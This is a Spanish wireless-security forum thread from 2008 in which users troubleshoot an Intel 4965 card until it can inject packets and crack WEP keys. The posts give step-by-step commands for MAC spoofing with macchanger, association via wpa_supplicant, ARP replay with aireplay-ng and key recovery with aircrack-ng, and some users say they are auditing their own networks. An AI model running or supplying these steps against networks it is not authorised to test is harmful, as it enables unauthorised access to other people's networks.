Seguridad Wireless - Wifi

General => Universo Wireless => Mensaje iniciado por: Bht Sata en 05-12-2008, 18:44 (Viernes)

Título: Inyectar con 4965
Publicado por: Bht Sata en 05-12-2008, 18:44 (Viernes)
Se que se ha hablado mucho ya del tema...pero es que he completado todos los manuales que he encontrado, y no ha habido forma alguna de conseguirlo, me sigue mostrando al hacer airmon-ng como chipset unknow y al intentar asociar se queda perdido, podeis hecharme una mano? estoy haciendo algo mal? no se suponia que en esta live venian los drivers ya cargados? perdonad por el post pero es que me desespero ya...gracias por todo :(
__________________________________________________________________________________

Resumen del post:

Video cedido por dexter back:
Inyeccion con la Tarjeta 4965 de Intel By: Dexter Back  (http://www.youtube.com/watch?v=yMgYyii69Ps)

Como  realizar la asociación usando wpa_supplicant:
Citar
La asociación pues, debemos realizar con wpa_supplicant de la siguiente manera:
- Primero debemos crear un fichero con la siguiente estructura:

Código:
network={
        ssid="ESSID"
        key_mgmt=NONE
        bssid=BSSID
        wep_key0="232323343478787"
}
Rellenamos los campos de ESSID y BSSID con los datos de nuestra red wifi. El campo de wep_key no hace falta cambiarlo, pues es una clave cualquiera.

Después lanzamos en consola:


Código:
sudo wpa_supplicant -c/home/dexterback/wpa.conf -Dwext -iwlan0

/home/dexterback/wpa.conf no hace falta decir que es la ruta... pero fijaros que el "-c" va "enganchado", no es ningún error.
Os saldrá un mensaje diciendo que se ha conectado al BSSID, importante no cerrar esta consola, ya que si se cierra se pierde la asociación.

Después ya hay que hacer los pasos típicos... y lanzar el ataque que uno quiera.

A mi de esta manera me funciona 100%, me inyecta alrededor de los 400pps, y en 3min o asi se consigue la key.

Espero que sirva de ayuda a la gente, y sobre todo tener en cuenta que la ASOCIACIÓN NO FUNCIONA CON AIREPLAY-NG, hay que realizarla con wpa_supplicant.

Aclaraciones:

Ya he asociado, ahora, ¿como inyecto?
Citar
se asocia con wpa_suplicant

pero......................... se inyecta con el atake 3 de aireplay   ;D ;D ;D

un saludo dexter back

Pero...¿wpa_supplicant no es solo para wpa?

No, usalo igualmente si tu contraseña es wep
Título: Re: Inyectar con 4965
Publicado por: dario en 06-12-2008, 16:49 (Sábado)
yo tengo la misma pone los pasos que haces y vemos que es lo que realizas mal o no funciona .
Título: Re: Inyectar con 4965
Publicado por: Bht Sata en 06-12-2008, 17:15 (Sábado)
Para empezar me reconoce el chipset con unknow,  :-\
Título: Re: Inyectar con 4965
Publicado por: pedrojose1989 en 06-12-2008, 17:59 (Sábado)
Bueno, para no abrir otro post inutilmente, pongo aqui mi duda. Se que estare cometiendo errores de bulto (de novato vamos jeje), pero por mas que intento que mi 4965 inyecte no lo consigo. El wifiway me arranca correctamente, me reconoce la tarjeta, y lo primero que hago es airmon-ng start wlan0. Me dice que el nuevo id es "mon0". Vale, entro a airoscript con ese id, pero cuando uso el paso 3 para inyectar en mi conexion, con todos los ataques me dice sending request pero en ninguno de los intentos me sale succesful.
Con airodump-ng, si he conseguido ponerla en monitor, pero no se como inyectar.
Si alguien fuese tan amable de decirme al menos, por donde tengo que empezar jeje. Muchas gracias, y enhorabuena por la distro.

PD: Trabajo desde una live usb completa
Título: Re: Inyectar con 4965
Publicado por: Bht Sata en 07-12-2008, 02:59 (Domingo)
Pero a ti al acer airmon-ng te reconoce el chipset como intel 4965?  :-\ :-\ :-\
Título: Re: Inyectar con 4965
Publicado por: dexter back en 07-12-2008, 11:01 (Domingo)
para inyectar con esta tarjeta no se hace con el aireplay por 1000lesima ves dicho ya
se hace con
Citar
La asociación pues, debemos realizar con wpa_supplicant de la siguiente manera:
- Primero debemos crear un fichero con la siguiente estructura:

Código:
network={
        ssid="ESSID"
        key_mgmt=NONE
        bssid=BSSID
        wep_key0=
"232323343478787"
}
Rellenamos los campos de ESSID y BSSID con los datos de nuestra red wifi. El campo de wep_key no hace falta cambiarlo, pues es una clave cualquiera.

Después lanzamos en consola:


Código:
sudo wpa_supplicant -c/home/dexterback/wpa.conf -Dwext -iwlan0

/home/dexterback/wpa.conf no hace falta decir que es la ruta... pero fijaros que el "-c" va "enganchado", no es ningún error.
Os saldrá un mensaje diciendo que se ha conectado al BSSID, importante no cerrar esta consola, ya que si se cierra se pierde la asociación.

Después ya hay que hacer los pasos típicos... y lanzar el ataque que uno quiera.

A mi de esta manera me funciona 100%, me inyecta alrededor de los 400pps, y en 3min o asi se consigue la key.

Espero que sirva de ayuda a la gente, y sobre todo tener en cuenta que la ASOCIACIÓN NO FUNCIONA CON AIREPLAY-NG, hay que realizarla con wpa_supplicant.
Título: Re: Inyectar con 4965
Publicado por: Bht Sata en 07-12-2008, 12:45 (Domingo)
Si, eso lo he leido, e intentado 1000 veces tambien   :P, se dice como asociar, pero si no puedo usar el aireplay, no se usar el wpa_suplicant para inyectar, ya que sabes tanto, me podrias decir como hacerlo?  ;) Gracias.
Título: Re: Inyectar con 4965
Publicado por: pedrojose1989 en 07-12-2008, 15:00 (Domingo)
Oye, muchas gracias por la respuesta, de verdad. Es que no sabia por donde empezar. Ley el tutorial de la seccion manuales "mi primera auditoria", pero no me habia quedado claro como inyectar con la 4965. Ahora en un rato, lo probare y os contare que tal.
Gracias por ser comprensivos con los novatos  >:(
Título: Re: Inyectar con 4965
Publicado por: pedrojose1989 en 07-12-2008, 17:10 (Domingo)
para inyectar con esta tarjeta no se hace con el aireplay por 1000lesima ves dicho ya
se hace con
Citar
La asociación pues, debemos realizar con wpa_supplicant de la siguiente manera:
- Primero debemos crear un fichero con la siguiente estructura:

Código:
network={
        ssid="ESSID"
        key_mgmt=NONE
        bssid=BSSID
        wep_key0=
"232323343478787"
}
Rellenamos los campos de ESSID y BSSID con los datos de nuestra red wifi. El campo de wep_key no hace falta cambiarlo, pues es una clave cualquiera.

Después lanzamos en consola:


Código:
sudo wpa_supplicant -c/home/dexterback/wpa.conf -Dwext -iwlan0

/home/dexterback/wpa.conf no hace falta decir que es la ruta... pero fijaros que el "-c" va "enganchado", no es ningún error.
Os saldrá un mensaje diciendo que se ha conectado al BSSID, importante no cerrar esta consola, ya que si se cierra se pierde la asociación.

Después ya hay que hacer los pasos típicos... y lanzar el ataque que uno quiera.

A mi de esta manera me funciona 100%, me inyecta alrededor de los 400pps, y en 3min o asi se consigue la key.

Espero que sirva de ayuda a la gente, y sobre todo tener en cuenta que la ASOCIACIÓN NO FUNCIONA CON AIREPLAY-NG, hay que realizarla con wpa_supplicant.
Veamos por pasos. Lo primero que hago es poner la tarjeta en modo monitor con airmon-ng start wlan0. Hasta ahi bien.
Luego, me voy a una carpeta cualquiera, y ahi creo un archivo llamado wpa.conf que contiene los datos de arriba, cambiando el essid="WLAN_XX" y el bssid=XX:XX:XX:XX:XX:XX.(entiendo que aqui se pone el AP)
Lo guardo, y me voy a la consola y escribo wpa_supplicant -c/root/swireless/wpa.conf -Dwext -iwlan0
Ahi es cuando me sale un error. Exactamente me sale esto:

ioctl[SIOCSIWAUTH]: Operation not supported
WEXT auth param 4 value 0x0 - ioctl[SIOCGIWSCAN]: Resource temporarily unavailable
ioctl[SIOCSIWSCAN]: Device or resource busy
Failed to initiate AP scan.
ioctl[SIOCGIWSCAN]: Resource temporarily unavailable
ioctl[SIOCSIWSCAN]: Device or resource busy

De todas formas, despues me voy al airoscript (porque no me manejo muy bien con la consola), y hago un scan, luego selecciono mi wireless, con cliente, y luego uso el ataque 3(fragmentacion). Algunas veces me sale authentification succesful, pero en otras se me queda sending request, y en la consola izquierda, me sale reading packets, pero no suben los data ni los ARP con lo que entiendo que no esta inyectando.
Bueno, espero vuestras respuestas para que me digais donde estoy cometiendo el error.
Título: Re: Inyectar con 4965
Publicado por: Bht Sata en 07-12-2008, 21:54 (Domingo)
Es que tienes que hacerlo con mon0, no con wlan0, en vez de -iwlan0 pon -imon0  ;)
Título: Re: Inyectar con 4965
Publicado por: pedrojose1989 en 07-12-2008, 22:24 (Domingo)
Me sigue saliendo el mismo error ???
Título: Re: Inyectar con 4965
Publicado por: Bht Sata en 07-12-2008, 23:27 (Domingo)
Ahora ya si que ni idea XD
Título: Re: Inyectar con 4965
Publicado por: *dudux en 07-12-2008, 23:43 (Domingo)
Me sigue saliendo el mismo error ???


 ???
Título: Re: Inyectar con 4965
Publicado por: pedrojose1989 en 07-12-2008, 23:58 (Domingo)
Se que estare cometiendo algun error de bulto por no manejarme en linux. Seguramente el error este en la forma de hacer el archivo wpa.conf
En el que yo hago, queda asi:
network={
        ssid="WLAN_XX"
        key_mgmt=NONE
        bssid=00:1A:XX:XX:XX:XX(¿Esto es el ap del cliente conectado no?)
        wep_key0="232323343478787"
}
La ruta del archivo es /root/wpa.conf
Luego escribo airmon-ng start wlan0, y se me crea la nueva interfaz mon0.
Despues de esto, escribo wpa_supplicant -c/root/wpa.conf -Dwext -imon0
Y justo aqui es cuando me aparece el error que nunca acaba, es decir, cada 5 segundos, me aparecen las mencionadas 5 lineas en un bucle infinito.

Título: Re: Inyectar con 4965
Publicado por: Bht Sata en 08-12-2008, 00:50 (Lunes)
Nos hemos desviado mucho del tema, por preguntar varias cosas en el mismo post  :P :P :P
La pregunta original es:
Citar
Se que se ha hablado mucho ya del tema...pero es que he completado todos los manuales que he encontrado, y no ha habido forma alguna de conseguirlo, me sigue mostrando al hacer airmon-ng como chipset unknow y al intentar asociar se queda perdido, podeis hecharme una mano? estoy haciendo algo mal? no se suponia que en esta live venian los drivers ya cargados? perdonad por el post pero es que me desespero ya...gracias por todo Sad

Porque sale unknow si se supone que los drivers vienen ya cargados no?  >:(

Título: Re: Inyectar con 4965
Publicado por: dexter back en 08-12-2008, 09:47 (Lunes)
Si, eso lo he leido, e intentado 1000 veces tambien   :P, se dice como asociar, pero si no puedo usar el aireplay, no se usar el wpa_suplicant para inyectar, ya que sabes tanto, me podrias decir como hacerlo?  ;) Gracias.

se asocia con wpa_suplicant

pero......................... se inyecta con el atake 3 de aireplay  ;D ;D ;D

un saludo dexter back
Título: Re: Inyectar con 4965
Publicado por: dexter back en 08-12-2008, 10:16 (Lunes)
Cita de: pedrojose1989 link=topic=17964.msg101547#msg101547 date=1228666252 [quote
Veamos por pasos. Lo primero que hago es poner la tarjeta en modo monitor con airmon-ng start wlan0. Hasta ahi bien.
Luego, me voy a una carpeta cualquiera, y ahi creo un archivo llamado wpa.conf que contiene los datos de arriba, cambiando el essid="WLAN_XX" y el bssid=XX:XX:XX:XX:XX:XX.(entiendo que aqui se pone el AP)
Lo guardo, y me voy a la consola y escribo wpa_supplicant -c/root/swireless/wpa.conf -Dwext -iwlan0
Ahi es cuando me sale un error. Exactamente me sale esto:

ioctl[SIOCSIWAUTH]: Operation not supported
WEXT auth param 4 value 0x0 - ioctl[SIOCGIWSCAN]: Resource temporarily unavailable
ioctl[SIOCSIWSCAN]: Device or resource busy
Failed to initiate AP scan.
ioctl[SIOCGIWSCAN]: Resource temporarily unavailable
ioctl[SIOCSIWSCAN]: Device or resource busy

De todas formas, despues me voy al airoscript (porque no me manejo muy bien con la consola), y hago un scan, luego selecciono mi wireless, con cliente, y luego uso el ataque 3(fragmentacion). Algunas veces me sale authentification succesful, pero en otras se me queda sending request, y en la consola izquierda, me sale reading packets, pero no suben los data ni los ARP con lo que entiendo que no esta inyectando.
Bueno, espero vuestras respuestas para que me digais donde estoy cometiendo el error.

ok checalo bien
solo va una ves................... ja ja ja  >:D >:D >:D

1.- airmon-ng start wlan0 channel
2.-ifconfig wlan0 down
3.-macchanger -m 00:11:22:33:44:55 wlan0
4.-ifconfig wlan0 up
5.-wpa_supplicant -c/root/swireless/wpa.conf -Dwext -iwlan0  unicamente en tu caso, por que esa es tu ubicacion, ojo a los demas lectores en cambiar esto he!!! y dejalo asi con iwlan0 , ademas de que no importa que te salga el error que mensionas arriba  ;)

Citar
ioctl[SIOCSIWAUTH]: Operation not supported
WEXT auth param 4 value 0x0 - ioctl[SIOCGIWSCAN]: Resource temporarily unavailable
ioctl[SIOCSIWSCAN]: Device or resource busy
Failed to initiate AP scan.
ioctl[SIOCGIWSCAN]: Resource temporarily unavailable
ioctl[SIOCSIWSCAN]: Device or resource busy
6.-airodump-ng -w dexter-back -c channel mon0
7.- aireplay-ng -3 -b mac ap -h 00:11:22:33:44:55 mon0
8.-aircrack-ng dexter-back.cap
9.-key found!!!

me gustaria hacerles un video tutorial pero la verdad es que me han dado lata los grabadores de pantalla
espero y les sirva esta mini guia  >:( >:( >:(

un saludo dexter back
Título: Re: Inyectar con 4965
Publicado por: *dudux en 08-12-2008, 11:42 (Lunes)
Código: [Seleccionar]
me gustaria hacerles un video tutorial pero la verdad es que me han dado lata los grabadores de pantalla
lleva wink instalado y ees muy facil
sino instala xvidcapture
Título: Re: Inyectar con 4965
Publicado por: Bht Sata en 08-12-2008, 11:52 (Lunes)
ESta muy bien, ahora lo hago haber, gracias ^^, pero porque me sale el chipset como unknow? Gracias por la ayuda ^^
Título: Re: Inyectar con 4965
Publicado por: pedrojose1989 en 08-12-2008, 12:36 (Lunes)
Cita de: pedrojose1989 link=topic=17964.msg101547#msg101547 date=1228666252 [quote
Veamos por pasos. Lo primero que hago es poner la tarjeta en modo monitor con airmon-ng start wlan0. Hasta ahi bien.
Luego, me voy a una carpeta cualquiera, y ahi creo un archivo llamado wpa.conf que contiene los datos de arriba, cambiando el essid="WLAN_XX" y el bssid=XX:XX:XX:XX:XX:XX.(entiendo que aqui se pone el AP)
Lo guardo, y me voy a la consola y escribo wpa_supplicant -c/root/swireless/wpa.conf -Dwext -iwlan0
Ahi es cuando me sale un error. Exactamente me sale esto:

ioctl[SIOCSIWAUTH]: Operation not supported
WEXT auth param 4 value 0x0 - ioctl[SIOCGIWSCAN]: Resource temporarily unavailable
ioctl[SIOCSIWSCAN]: Device or resource busy
Failed to initiate AP scan.
ioctl[SIOCGIWSCAN]: Resource temporarily unavailable
ioctl[SIOCSIWSCAN]: Device or resource busy

De todas formas, despues me voy al airoscript (porque no me manejo muy bien con la consola), y hago un scan, luego selecciono mi wireless, con cliente, y luego uso el ataque 3(fragmentacion). Algunas veces me sale authentification succesful, pero en otras se me queda sending request, y en la consola izquierda, me sale reading packets, pero no suben los data ni los ARP con lo que entiendo que no esta inyectando.
Bueno, espero vuestras respuestas para que me digais donde estoy cometiendo el error.

ok checalo bien
solo va una ves................... ja ja ja  >:D >:D >:D

1.- airmon-ng start wlan0 channel
2.-ifconfig wlan0 down
3.-macchanger -m 00:11:22:33:44:55 wlan0
4.-ifconfig wlan0 up
5.-wpa_supplicant -c/root/swireless/wpa.conf -Dwext -iwlan0  unicamente en tu caso, por que esa es tu ubicacion, ojo a los demas lectores en cambiar esto he!!! y dejalo asi con iwlan0 , ademas de que no importa que te salga el error que mensionas arriba  ;)

Citar
ioctl[SIOCSIWAUTH]: Operation not supported
WEXT auth param 4 value 0x0 - ioctl[SIOCGIWSCAN]: Resource temporarily unavailable
ioctl[SIOCSIWSCAN]: Device or resource busy
Failed to initiate AP scan.
ioctl[SIOCGIWSCAN]: Resource temporarily unavailable
ioctl[SIOCSIWSCAN]: Device or resource busy
6.-airodump-ng -w dexter-back -c channel mon0
7.- aireplay-ng -3 -b mac ap -h 00:11:22:33:44:55 mon0
8.-aircrack-ng dexter-back.cap
9.-key found!!!

me gustaria hacerles un video tutorial pero la verdad es que me han dado lata los grabadores de pantalla
espero y les sirva esta mini guia  >:( >:( >:(

un saludo dexter back
Muchisimas graciasssss. Por fin he conseguido inyectar a un rate de 480pps. ¿Cuantos data son necesarios para que el aircrack me diga key found? Porque yo he llegado a sacar 411000 IVs y despues de estar el aircrack mas de 15 minutos analizando keys (hasta unos 3 millones), no me sale eso.
Título: Re: Inyectar con 4965
Publicado por: Bht Sata en 08-12-2008, 12:44 (Lunes)
LOL, yo tambien lo acabo de hacer y funciona perfectamente, yo voy a 500 pps ^^, lo unico que yo e sacado unos 40.000 ivs, y el aircrack lleva ya media hora analizando, y lleva analizados casi 30.000.000 de keys, es normal esto?
Título: Re: Inyectar con 4965
Publicado por: *dudux en 08-12-2008, 14:11 (Lunes)
de 50.000 a 100.000 maximo con ptw
y con ng no hay numero standard < de 1.000.000 ivs
Título: Re: Inyectar con 4965
Publicado por: Bht Sata en 08-12-2008, 14:13 (Lunes)
Esto empieza a dar miedo XD, llevo 2h con el aircrack, y ya ha analizado 100 millones de keys, lo paro? o ke ago, esta aciendo algo mal?  :-\
Título: Re: Inyectar con 4965
Publicado por: berni69 en 08-12-2008, 14:15 (Lunes)
quizas contiene algun falso positivo y por eso no das cob la clave,,, empieza de nuevo la captura ;)
Título: Re: Inyectar con 4965
Publicado por: chinitiw en 08-12-2008, 14:16 (Lunes)
la verdad no se que falla pero buena pinta no tiene , eso fijo ... en mi caso con 80.000 sin problema ...

Advertencia - mientras estabas escribiendo, una nueva respuesta fue publicada. Probablemente desees revisar tu mensaje. va a ser que no  ;D


haz caso a lo que te comenta Berni que tiene toda la pinta de ser eso ... ;)
Título: Re: Inyectar con 4965
Publicado por: *dudux en 08-12-2008, 14:22 (Lunes)
desactivar ataquies korek y usar -f 1 o fuerza en los ultimos bytes con x1 y x2
usar aircrack-ng 1.0 rc1
Título: Re: Inyectar con 4965
Publicado por: Bht Sata en 08-12-2008, 14:54 (Lunes)
Al usar el aircrack deberia poner algo asi no? Tested xxxx keys / xxxxx total keys o algo asi no? porque solo me salen las tested keys, no me dice cuantas hay
Título: Re: Inyectar con 4965
Publicado por: *dudux en 08-12-2008, 15:32 (Lunes)
Al usar el aircrack deberia poner algo asi no? Tested xxxx keys / xxxxx total keys o algo asi no? porque solo me salen las tested keys, no me dice cuantas hay

si
Título: Re: Inyectar con 4965
Publicado por: Bht Sata en 08-12-2008, 16:12 (Lunes)
Bien, pues aun capturando un archivo .cap de 100 megas, no me aparecen las totales, solo las que va testeando, creo que ese es el motivo de que sea infinito  :-\
Título: Re: Inyectar con 4965
Publicado por: pedrojose1989 en 08-12-2008, 16:35 (Lunes)
Yo con un archivo de capturas de 170 megas, me pasa lo mismo que a ti. No me dice las totales, solo las comprobadas
Título: Re: Inyectar con 4965
Publicado por: dexter back en 08-12-2008, 22:28 (Lunes)
yo con tan solo 18000 datas
key found!!!!! ;D ;D ;D

cabe hacer mencion de que tengo instalado el aircrack rc1, ptw  >:D
recuerden que en el aircrack sensillo la opcion -z es usada como el ptw, asi que les aconsejo que usen esta opcion y tal ves tengas mejores resultados. ejemplo

aircrack-ng -z dexter-back.cap


prueben y me cuentan ok??

un saludo dexter back
Título: Re: Inyectar con 4965
Publicado por: Bht Sata en 08-12-2008, 22:41 (Lunes)
Eso no viene ya en el ultimo wifiway? el problema no es que sea ptw o no, sino que ay un fallo por el cual nunca termina de buscar  :-\, y a mi me sigue apareciendo el chipset como unknow ¬¬, pero gracias, lo probaré  ;D ;D ;D
Título: Re: Inyectar con 4965
Publicado por: dexter back en 08-12-2008, 22:56 (Lunes)
otra cosa que pueden hacer
es guardar el archivo cap  en el odenador
e iniciar con otra live, por ejemplo la beta de wifi way
en esa no habia est eproblema, depues van a al  aircrack, especifican la ruta de archivo cap y se supone que ahi deberian de obtener la key, y sirve que salen de dudas, si la obtiene es claro que el problema seria de la live final, ojala y no sea eso, ya que han hecho un gran trabajo.

un saludo dexter back
Título: Re: Inyectar con 4965
Publicado por: *dudux en 08-12-2008, 23:01 (Lunes)
no viene pq wes inestable todavia.....
asii que dexter tu usas wifway o otro linux?¿
Título: Re: Inyectar con 4965
Publicado por: dexter back en 08-12-2008, 23:18 (Lunes)
yo simpre he usado wifislax
pero como hace algunos meses
no era posible la inyeccion con este
intale el ubuntu, y es el que uso ahora
los pasos que he posteado son los que uso en ubuntu,
pero igual sirven para wifi way como se habran dado cuenta ya inyectan
Título: Re: Inyectar con 4965
Publicado por: Bht Sata en 09-12-2008, 15:49 (Martes)
Una pregunta, como hago para injectar si no tiene clientes asociados? ya que si uso la autentificacion falsa del aireplay tampoco me vale, como lo ago con el wpa_supplicant u otra forma? gracias por la ayuda  >:(
Título: Re: Inyectar con 4965
Publicado por: dexter back en 09-12-2008, 21:38 (Martes)
https://foro.seguridadwireless.net/index.php/topic,17964.msg101514.html#msg101514 (https://foro.seguridadwireless.net/index.php/topic,17964.msg101514.html#msg101514) :P :P :P
Título: Re: Inyectar con 4965
Publicado por: Jacko en 10-12-2008, 02:48 (Miércoles)
Hola he seguido los pasos que aquí se han dicho y esto es lo que consigo:
cuando hago lo del wpa_supplicant -c/root/wpa.conf -Dwext -iwlan0 
consigo:
wifiway ~ # wpa_supplicant -c/root/swireless/wpa.conf -Dwext -iwlan0
ioctl[SIOCSIWAUTH]: Operation not supported
WEXT auth param 4 value 0x0 - Trying to associate with 00:02:cf:cf:c3:86 (SSID='WLAN_DE' freq=2452 MHz)
ioctl[SIOCSIWENCODEEXT]: Invalid argument
Associated with 00:02:cf:cf:c3:86
CTRL-EVENT-CONNECTED - Connection to 00:02:cf:cf:c3:86 completed (auth) [id=0 id_str=]

y se queda ahí, no sale ni siquiera el promt, pero aun así consigo asociarme.
Aunque ya si lo hago por segunda vez, tercera, cuarta vez ... me sale ya siempre esto:

wifiway ~ # wpa_supplicant -c/root/swireless/wpa.conf -Dwext -iwlan0
ioctl[SIOCSIWAUTH]: Operation not supported
WEXT auth param 4 value 0x0 - ioctl[SIOCGIWSCAN]: Resource temporarily unavailable
ioctl[SIOCSIWSCAN]: Device or resource busy
Failed to initiate AP scan.
ioctl[SIOCGIWSCAN]: Resource temporarily unavailable
ioctl[SIOCSIWSCAN]: Device or resource busy
Failed to initiate AP scan.
ioctl[SIOCGIWSCAN]: Resource temporarily unavailable
ioctl[SIOCSIWSCAN]: Device or resource busy
Failed to initiate AP scan.

Y esta vez no se me asocia, simplemente entra como en un bucle infinito y cada poco tiempo muestra el mismo mensaje.

Aun asi, la 1º que lo hago (la vez que se me asocia) ejecuto aireplay-ng -3 -b mac ap -h 00:11:22:33:44:55 mon0 y  me sale reading packets, y el numero de paketes leidos va subiendo pero no suben los data ni los ARP ni nada.

¿Alguien sabe porque no me inyecta o porque me salen esos mensajes cuando ejecuto el wpa_supplicant ?




Título: Re: Inyectar con 4965
Publicado por: dexter back en 10-12-2008, 06:10 (Miércoles)
¿Alguien sabe porque no me inyecta o porque me salen esos mensajes cuando ejecuto el wpa_supplicant ?

hiciste el paso # 3 que menciono aqui?
https://foro.seguridadwireless.net/live_cd_wifiway_10_renovation_kde/inyectar_con_4965-t17964.0.html;msg101629#msg101629 (https://foro.seguridadwireless.net/live_cd_wifiway_10_renovation_kde/inyectar_con_4965-t17964.0.html;msg101629#msg101629)
si no lo hiciste, ese es tu error y por eso no te inyecta  ;)

recuerda que la ventana del wpa_supplicant no se debe de cerrar he!!!
Título: Re: Inyectar con 4965
Publicado por: Jacko en 10-12-2008, 12:04 (Miércoles)
Por supuesto, he seguidos todos los pasos a raja tabla.

¿tu sabes porque no me inyecta o porque me salen esos mensajes cuando ejecuto el wpa_supplicant ?
Es que ya no se que hacer  :'(
Título: Re: Inyectar con 4965
Publicado por: Bht Sata en 10-12-2008, 14:39 (Miércoles)
Hay un cliente ya asociado? o estas asociandote tu solamente, es que cuando YA HABIA CLIENTE si que me subian los arp al hacer la desautentificacion, pero solo con la autentificacion falsa no suben  >:(

PD: Dexter donde me as remitido dice que no se puede inyectar con el aireplay, pero no dices como hacerlo con el wpa supplicant  ;)
Título: Re: Inyectar con 4965
Publicado por: Jacko en 10-12-2008, 15:43 (Miércoles)
En mi caso no habia ningun nadie asociado.
Tu sabes cual es el problema que tengo ?
Y con respecto al wpa_supplicant alguien sabria decirme pk obtengo eso ?
Otra cosa mas, despues de hacer todo esto, si cierro airodump y todas las consolas, y en general todo programa que user la tarjeta de red, luego voy a usar el asistente wireless para conectarme a la wifi de mi casa, y no me deja, creo que porque la tarjeta wireless sigue en uso por alguno de los programas que he usado antes. He probado a hacer un ifconfig wlan0 down y luego un ifconfig wlan0 up pero sin exito, esta es otra duda que me gustaria que alguien me la aclarase.
Un saludo.  ;)
Título: Re: Inyectar con 4965
Publicado por: krouly en 10-12-2008, 16:20 (Miércoles)
Respecto al wpa_supplicant a mi me ocurre lo mismo que al compañero Jacko, me entra en un bucle infinito repitiendo el mismo mensaje que ha el.

Sigo probando aver si lo consigo.
Gracias
Título: Re: Inyectar con 4965
Publicado por: chinitiw en 10-12-2008, 16:42 (Miércoles)
Citar
PD: Dexter donde me as remitido dice que no se puede inyectar con el aireplay, pero no dices como hacerlo con el wpa supplicant

poruqe wpa_supplicant es solo para asociar , para reinyectar aireplay-ng -3 ...  ;)

Saludos
Título: Re: Inyectar con 4965
Publicado por: dexter back en 11-12-2008, 05:21 (Jueves)
Citar
PD: Dexter donde me as remitido dice que no se puede inyectar con el aireplay, pero no dices como hacerlo con el wpa supplicant

por que wpa_supplicant es solo para asociar , para reinyectar aireplay-ng -3 ...  ;)

Saludos

en efecto
se asocia con wpa_supplicant
y se inyectar con aireplay-ng -3

Título: Re: Inyectar con 4965
Publicado por: krouly en 11-12-2008, 18:14 (Jueves)
Gracias por la respuesta.
Ya lo he conseguido, lo unico que he cambiado a sido quitar el codigo donde pones la mac ficticia y a la hora de inyectar pongo la mac real mia.

No se porque, pero funciona si alguien que sepa mas me puede decir porque lo agradeceria. Por curiosidad.

Gracias de nuevo.

PD: Probandolo contra mi propio router se bloqueo el router una vez terminado todo y no se porque, puede ser x la cantidad de paquetes que envie?
Título: Re: Inyectar con 4965
Publicado por: ѕтr0ĸ0™ en 11-12-2008, 18:46 (Jueves)
Bueno acabo de probar con una 4965  con un router 2wire  y funciona perfecto , me obtenia 500 data/seg y aunque parece del todo no estable , porque me bajaba los data hasta 20.

pero funciona perfectamente  >:(

pd Es recomendable destruir la otra interfaz wlan0?
se obtiene un mayor desempeño al obtener arp ?
Título: Re: Inyectar con 4965
Publicado por: Bht Sata en 11-12-2008, 19:16 (Jueves)
Si destruyes la interfaz wlan0 no podras asociar  ;D
Título: Re: Inyectar con 4965
Publicado por: dario en 14-12-2008, 14:46 (Domingo)
pregunta esto es para hacer auditoria gral o es solo para wpa ?
Me estoy iniciando en esto e intento hacer una auditoria a mi propia red y poseo la misma placa! 4965agn y mi red la encripte en wep que creo que para aprender es lo mas facil..
Mi red se llama default y esta en el canal 1 tipo de encriptacion wep

estos son los pasos que sigo !


macchanger -m 00:11:22:33:44:55 wlan0
iwconfig wlan0 mode monitor
airodump-ng wlan0
airodump-ng -w Default -c 1 wlan0
aireplay-ng -1 0 -e Default -a bssid -h 00:11:22:33:44:55 wlan0
aireplay-ng -3 -b bssid -h 00:11:22:33:44:55 wlan0
aircrack-ng red-01.cap


empieza a capturar paquetes pero el resto no se mueve  ej
 read 12000 packets (got 0 ARP requests and 0 ACKS) sent 0 packets ... (0 pps)

o sea no se mueven los arp ni los acks ni nada ..

alguna idea o si me pueden dar una mano es mi propia red la que ando haciendo prueba el resto de redes de mis vecinos son wpa  pero no me interesa acceder a ellas solo a la mia :D
gracias

Título: Re: Inyectar con 4965
Publicado por: Lugia en 14-12-2008, 16:53 (Domingo)
pregunta esto es para hacer auditoria gral o es solo para wpa ?
Me estoy iniciando en esto e intento hacer una auditoria a mi propia red y poseo la misma placa! 4965agn y mi red la encripte en wep que creo que para aprender es lo mas facil..
Mi red se llama default y esta en el canal 1 tipo de encriptacion wep

estos son los pasos que sigo !


macchanger -m 00:11:22:33:44:55 wlan0
iwconfig wlan0 mode monitor
airodump-ng wlan0
airodump-ng -w Default -c 1 wlan0
aireplay-ng -1 0 -e Default -a bssid -h 00:11:22:33:44:55 wlan0
aireplay-ng -3 -b bssid -h 00:11:22:33:44:55 wlan0
aircrack-ng red-01.cap


empieza a capturar paquetes pero el resto no se mueve  ej
 read 12000 packets (got 0 ARP requests and 0 ACKS) sent 0 packets ... (0 pps)

o sea no se mueven los arp ni los acks ni nada ..

alguna idea o si me pueden dar una mano es mi propia red la que ando haciendo prueba el resto de redes de mis vecinos son wpa  pero no me interesa acceder a ellas solo a la mia :D
gracias



tienes que usar el wpa_supplicant pata hacer la asociación, mira los posts anteriores en este mismo hilo
Título: Re: Inyectar con 4965
Publicado por: SERASER en 14-12-2008, 17:42 (Domingo)
no tiene que usar wpa suplicant tiene wep
Título: Re: Inyectar con 4965
Publicado por: Bht Sata en 14-12-2008, 17:53 (Domingo)
no tiene que usar wpa suplicant tiene wep

Si hubieras leido el post, no habrias contextado eso, te lo aseguro, leete el post, y lo entenderás, la tonteria que acabas de decir ya esta aclarada,y si, HAY QUE USAR WPA _SUPPLICANT aunque sea wep, 1 saludo ;)
Título: Re: Inyectar con 4965
Publicado por: dario en 14-12-2008, 18:09 (Domingo)
gracias  no probe lo del post por que crei como dije que solo era para wpa pero ahi lo probare, y aqui les dejo la captura para que vean q es mi red la que deseo audiar por que si deseo robar internet poseo redes abiertas de sobra ya que donde vivo son gratis :D

http://img511.imageshack.us/img511/5462/instantnea1zs9.th.png

ahi seguira su guia y gracias por su respuesta :D
Título: Re: Inyectar con 4965
Publicado por: SERASER en 14-12-2008, 18:17 (Domingo)
oye Bht  Satha tu no te equivocas nunca NO ME GRITES VALE

un saludo >:D
Título: Re: Inyectar con 4965
Publicado por: Bht Sata en 14-12-2008, 21:43 (Domingo)
Porque os a dado a todos por decir que os grito, no os grito hombre, en realidad lo susurro  ;D ;D, nah simplemente no teniga ganas de citar donde lo ponia, y te lo dije asi, pero no era un grito  ^-^, solo remarcaba una parte para que al que fuera detras no se le pasara por alto  >:(,  ;)
Título: Re: Inyectar con 4965
Publicado por: SERASER en 14-12-2008, 21:51 (Domingo)
ok ;)
Título: Re: Inyectar con 4965
Publicado por: dexter back en 15-12-2008, 05:52 (Lunes)
hola antes que nada espero y no haya problema si pongo esto aqui  ;)
y 2do una disculpa por la calidad, pero como ya habia mencionado, me dan lata los grabadores de pantalla  :-\

